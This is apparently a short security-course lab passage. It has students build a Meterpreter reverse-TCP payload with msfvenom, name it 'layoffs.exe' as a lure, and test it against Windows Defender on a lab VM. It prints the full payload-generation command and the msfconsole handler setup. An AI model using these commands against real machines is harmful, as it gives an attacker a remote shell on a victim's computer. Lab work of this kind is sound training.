In this part of the lab, you create a "malicious" payload using MSFvenom. The payload will be copied (USB, email, Kali VM-> Host -> Windows VM, etc.) to the Windows 10 target. You will execute the payload on the Windows 10 target with Windows Defender disabled first. This will prove your payload is working. Next, you will enable Windows Defender and try to execute the payload again.

To generate the payload, you will use this:

msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=X.X.X.X LPORT=53 -f exe -o layoffs.exe

To enable the handler, you will use this:

msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set lport 53